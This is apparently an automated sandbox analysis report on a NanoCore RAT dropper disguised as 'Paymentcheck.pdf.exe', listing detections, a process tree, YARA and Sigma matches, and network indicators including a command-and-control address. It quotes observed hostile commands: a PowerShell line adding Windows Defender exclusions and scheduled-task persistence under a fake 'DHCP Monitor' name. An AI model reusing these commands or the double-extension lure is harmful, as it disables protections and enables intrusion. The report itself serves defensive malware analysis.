Windows Analysis Report Paymentcheck.pdf.exe

Overview

General Information

Sample Name: Paymentcheck.pdf.exe
Analysis ID: 458302
MD5: b7e3c3c9735d6ba37616d791171fe2db
SHA1: 8763c22ed1151ec2c5b584415154ec7e3c50d964
SHA256: 91b97fb3f4695fd57c723b537c5b811195f9f99b0ac6033835f75444c36712b9
Tags: exe, NanoCoreRAT

Detection

Nanocore
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Nanocore Rat
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: NanoCore
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM3
Yara detected Nanocore RAT
.NET source code contains potential unpacker
Creates an undocumented autostart registry key
Executable has a suspicious name (potential lure to open the executable)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign process
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Suspicious Process Start Without DLL
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Uses an obfuscated file name to hide its real file extension (double extension)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Antivirus or Machine Learning detection for unpacked file
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Paymentcheck.pdf.exe (PID: 3736 cmdline: 'C:\Users\user\Desktop\Paymentcheck.pdf.exe' MD5: B7E3C3C9735D6BA37616D791171FE2DB)
    • wscript.exe (PID: 6464 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Voymjqpmrcebffsjwfsb.vbs' MD5: 7075DD7B9BE8807FCA93ACD86F724884)
      • powershell.exe (PID: 6860 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 6872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • RegAsm.exe (PID: 6732 cmdline: C:\Users\user\AppData\Local\Temp\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)
      • schtasks.exe (PID: 1748 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp715E.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 5968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • schtasks.exe (PID: 6352 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp7DD3.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 2340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • RegAsm.exe (PID: 1476 cmdline: C:\Users\user\AppData\Local\Temp\RegAsm.exe 0 MD5: 6FD7592411112729BF6B1F2F6C34899F)
    • conhost.exe (PID: 1088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • dhcpmon.exe (PID: 5556 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0 MD5: 6FD7592411112729BF6B1F2F6C34899F)
    • conhost.exe (PID: 5584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • dhcpmon.exe (PID: 6448 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' MD5: 6FD7592411112729BF6B1F2F6C34899F)
    • conhost.exe (PID: 7008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000000D.00000002.939558053.0000000006030000.00000004.00000001.sdmp | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
  • 0x4bbb:$x1: NanoCore.ClientPluginHost
  • 0x4be5:$x2: IClientNetworkHost
0000000D.00000002.939558053.0000000006030000.00000004.00000001.sdmp | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth
  • 0x4bbb:$x2: NanoCore.ClientPluginHost
  • 0x6a6b:$s4: PipeCreated
0000000D.00000002.941661352.0000000006930000.00000004.00000001.sdmp | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
  • 0x5b0b:$x1: NanoCore.ClientPluginHost
  • 0x5b44:$x2: IClientNetworkHost
0000000D.00000002.941661352.0000000006930000.00000004.00000001.sdmp | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth
  • 0x5b0b:$x2: NanoCore.ClientPluginHost
  • 0x5c0f:$s4: PipeCreated
  • 0x5b25:$s5: IClientLoggingHost
00000000.00000002.822099971.0000000002AF6000.00000004.00000001.sdmp | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
  • 0x47acc5:$x1: NanoCore.ClientPluginHost
  • 0x47ad02:$x2: IClientNetworkHost
  • 0x47e835:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
(48 entries in total; only the first five are shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
13.2.RegAsm.exe.69a0000.33.raw.unpack | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
  • 0x350b:$x1: NanoCore.ClientPluginHost
  • 0x3525:$x2: IClientNetworkHost
13.2.RegAsm.exe.69a0000.33.raw.unpack | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth
  • 0x350b:$x2: NanoCore.ClientPluginHost
  • 0x52b6:$s4: PipeCreated
  • 0x34f8:$s5: IClientLoggingHost
13.2.RegAsm.exe.69b0000.36.raw.unpack | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
  • 0x1f1db:$x1: NanoCore.ClientPluginHost
  • 0x1f1f5:$x2: IClientNetworkHost
13.2.RegAsm.exe.69b0000.36.raw.unpack | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth
  • 0x1f1db:$x2: NanoCore.ClientPluginHost
  • 0x22518:$s4: PipeCreated
  • 0x1f1c8:$s5: IClientLoggingHost
13.2.RegAsm.exe.69a0000.33.unpack | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
  • 0x170b:$x1: NanoCore.ClientPluginHost
  • 0x1725:$x2: IClientNetworkHost
(123 entries in total; only the first five are shown)

Sigma Overview

AV Detection:

Sigma detected: NanoCore
Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ProcessId: 6732, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

E-Banking Fraud:

Sigma detected: NanoCore

System Summary:

Sigma detected: Suspicious Process Start Without DLL
Source: Process started; Author: Florian Roth; Data: Command: C:\Users\user\AppData\Local\Temp\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ParentCommandLine: 'C:\Users\user\Desktop\Paymentcheck.pdf.exe' , ParentImage: C:\Users\user\Desktop\Paymentcheck.pdf.exe, ParentProcessId: 3736, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ProcessId: 6732
Sigma detected: Suspicious Script Execution From Temp Folder
Source: Process started; Author: Florian Roth, Max Altgelt; Data: Command: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Voymjqpmrcebffsjwfsb.vbs' , CommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Voymjqpmrcebffsjwfsb.vbs' , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: 'C:\Users\user\Desktop\Paymentcheck.pdf.exe' , ParentImage: C:\Users\user\Desktop\Paymentcheck.pdf.exe, ParentProcessId: 3736, ProcessCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Voymjqpmrcebffsjwfsb.vbs' , ProcessId: 6464
Sigma detected: WScript or CScript Dropper
Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (rule), oscd.community; Data: Command: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Voymjqpmrcebffsjwfsb.vbs' , CommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Voymjqpmrcebffsjwfsb.vbs' , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: 'C:\Users\user\Desktop\Paymentcheck.pdf.exe' , ParentImage: C:\Users\user\Desktop\Paymentcheck.pdf.exe, ParentProcessId: 3736, ProcessCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Voymjqpmrcebffsjwfsb.vbs' , ProcessId: 6464
Sigma detected: Non Interactive PowerShell
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exe', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exe', CommandLine|base64offset|contains: I~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Voymjqpmrcebffsjwfsb.vbs' , ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 6464, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exe', ProcessId: 6860
Sigma detected: Possible Applocker Bypass
Source: Process started; Author: juju4; Data: Command: C:\Users\user\AppData\Local\Temp\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ParentCommandLine: 'C:\Users\user\Desktop\Paymentcheck.pdf.exe' , ParentImage: C:\Users\user\Desktop\Paymentcheck.pdf.exe, ParentProcessId: 3736, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ProcessId: 6732

Stealing of Sensitive Information:

Sigma detected: NanoCore

Remote Access Functionality:

Sigma detected: NanoCore

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exe; ReversingLabs: Detection: 32%
Yara detected Nanocore RAT
Source: Yara match; File source: 0.2.Paymentcheck.pdf.exe.3aa1970.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 13.2.RegAsm.exe.3814c35.11.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 13.2.RegAsm.exe.382dc19.10.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 13.2.RegAsm.exe.38295f0.9.unpack, type: UNPACKEDPE
Source: Yara match; File source: 13.2.RegAsm.exe.38295f0.9.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 13.2.RegAsm.exe.5210000.21.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 13.2.RegAsm.exe.5210000.21.unpack, type: UNPACKEDPE
Source: Yara match; File source: 13.2.RegAsm.exe.5214629.20.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Paymentcheck.pdf.exe.3aa1970.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 13.2.RegAsm.exe.394c3ad.12.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 13.2.RegAsm.exe.39609da.14.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 13.2.RegAsm.exe.3940179.13.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000000.00000002.824901195.0000000003A21000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000D.00000002.938540171.0000000005210000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000D.00000002.930842679.00000000027C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000D.00000002.926760586.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000D.00000002.933309762.0000000003811000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.825194735.0000000003AA1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000D.00000002.933547631.0000000003891000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: Paymentcheck.pdf.exe PID: 3736, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: RegAsm.exe PID: 6732, type: MEMORYSTR
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exe; Joe Sandbox ML: detected
Machine Learning detection for sample
Source: Paymentcheck.pdf.exe; Joe Sandbox ML: detected
Source: 13.2.RegAsm.exe.400000.0.unpack; Avira: Label: TR/Dropper.MSIL.Gen7
Source: 13.2.RegAsm.exe.5210000.21.unpack; Avira: Label: TR/NanoCore.fadte
Source: Paymentcheck.pdf.exe; Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: Paymentcheck.pdf.exe; Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: RegAsm.pdb source: RegAsm.exe, dhcpmon.exe, dhcpmon.exe, 00000019.00000000.859072816.0000000000DF2000.00000002.00020000.sdmp
Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: RegAsm.exe, 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmp
Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 0000000D.00000000.820068225.00000000004A2000.00000002.00020000.sdmp, RegAsm.exe, 00000012.00000000.835793431.0000000000992000.00000002.00020000.sdmp, dhcpmon.exe, 00000016.00000002.844182498.0000000000E62000.00000002.00020000.sdmp, dhcpmon.exe, 00000019.00000000.859072816.0000000000DF2000.00000002.00020000.sdmp
Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegAsm.exe, 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: RegAsm.exe, 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmp
Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: RegAsm.exe, 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmp
Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegAsm.exe, 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: RegAsm.exe, 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmp
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe; Code function: 4x nop then lea esp, dword ptr [ebp-04h] 13_2_0619A2D0

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49771 -> 217.138.212.57:2018
Source: global traffic; TCP traffic: 192.168.2.4:49771 -> 217.138.212.57:2018
Source: unknown; TCP traffic detected without corresponding DNS query: 217.138.212.57
Source: powershell.exe, 0000000E.00000002.930072177.0000000002E25000.00000004.00000020.sdmp; String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmp; String found in binary or memory: http://fontfabrik.com
Source: RegAsm.exe, 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmp; String found in binary or memory: http://google.com
Source: powershell.exe, 0000000E.00000002.933022255.0000000004B78000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.933111295.0000000004BAB000.00000004.00000001.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: Paymentcheck.pdf.exe, 00000000.00000002.821957126.0000000002A21000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.931755679.00000000048B4000.00000004.00000001.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.933022255.0000000004B78000.00000004.00000001.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000000E.00000002.933022255.0000000004B78000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.933111295.0000000004BAB000.00000004.00000001.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmp; String found in binary or memory: http://www.carterandcone.coml
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers8
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers?
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designersG
Source: Paymentcheck.pdf.exe, 00000000.00000002.821699982.0000000001277000.00000004.00000040.sdmp; String found in binary or memory: http://www.fontbureau.comV
Source: Paymentcheck.pdf.exe, 00000000.00000002.821699982.0000000001277000.00000004.00000040.sdmp; String found in binary or memory: http://www.fontbureau.coma
Source: Paymentcheck.pdf.exe, 00000000.00000002.821699982.0000000001277000.00000004.00000040.sdmp; String found in binary or memory: http://www.fontbureau.comgrita
Source: Paymentcheck.pdf.exe, 00000000.00000002.821699982.0000000001277000.00000004.00000040.sdmp; String found in binary or memory: http://www.fontbureau.comttva
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmp; String found in binary or memory: http://www.fonts.com
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmp; String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmp; String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmp; String found in binary or memory: http://www.goodfont.co.kr
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmp; String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmp; String found in binary or memory: http://www.sajatypeworks.com
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmp; String found in binary or memory: http://www.sakkal.com
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmp; String found in binary or memory: http://www.sandoll.co.kr
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmp; String found in binary or memory: http://www.tiro.com
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmp; String found in binary or memory: http://www.typography.netD
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmp; String found in binary or memory: http://www.urwpp.deDPlease
Source: Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmp; String found in binary or memory: http://www.zhongyicts.com.cn
Source: powershell.exe, 0000000E.00000002.933022255.0000000004B78000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.933111295.0000000004BAB000.00000004.00000001.sdmp; String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000E.00000002.933022255.0000000004B78000.00000004.00000001.sdmp; String found in binary or memory: https://oneget.org
Source: powershell.exe, 0000000E.00000002.933022255.0000000004B78000.00000004.00000001.sdmp; String found in binary or memory: https://oneget.orgformat.ps1xmlagement.dll2040.missionsand
Source: RegAsm.exe, 0000000D.00000002.933547631.0000000003891000.00000004.00000001.sdmp; Binary or memory string: RegisterRawInputDevices

E-Banking Fraud:

Yara detected Nanocore RAT

System Summary:

barindex
Malicious sample detected (through community Yara rule)Show sources
Source: 13.2.RegAsm.exe.69a0000.33.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 13.2.RegAsm.exe.69b0000.36.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 13.2.RegAsm.exe.69a0000.33.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 13.2.RegAsm.exe.6970000.31.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 0.2.Paymentcheck.pdf.exe.3aa1970.3.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 0.2.Paymentcheck.pdf.exe.3aa1970.3.unpack, type: UNPACKEDPE | Matched rule: NanoCore | Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegAsm.exe.2863ac4.5.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 13.2.RegAsm.exe.6030000.23.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 13.2.RegAsm.exe.3b0ad77.15.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 13.2.RegAsm.exe.3b0ad77.15.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore | Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegAsm.exe.37c9930.8.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 13.2.RegAsm.exe.3b21fd6.17.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 13.2.RegAsm.exe.3814c35.11.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 0.2.Paymentcheck.pdf.exe.2f60b38.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 0.2.Paymentcheck.pdf.exe.2f60b38.1.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore | Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegAsm.exe.6950000.29.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 13.2.RegAsm.exe.3b13ba6.16.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 13.2.RegAsm.exe.37d81d4.6.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 13.2.RegAsm.exe.382dc19.10.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 13.2.RegAsm.exe.69b0000.36.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 13.2.RegAsm.exe.69f0000.37.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: NanoCore | Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegAsm.exe.38295f0.9.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 13.2.RegAsm.exe.69b4c9f.34.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 13.2.RegAsm.exe.6930000.27.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 13.2.RegAsm.exe.3b0ad77.15.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 13.2.RegAsm.exe.38295f0.9.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 13.2.RegAsm.exe.3b21fd6.17.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 13.2.RegAsm.exe.2857848.3.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore | Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegAsm.exe.4ff0000.19.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 13.2.RegAsm.exe.37ce5cf.7.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 13.2.RegAsm.exe.5210000.21.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
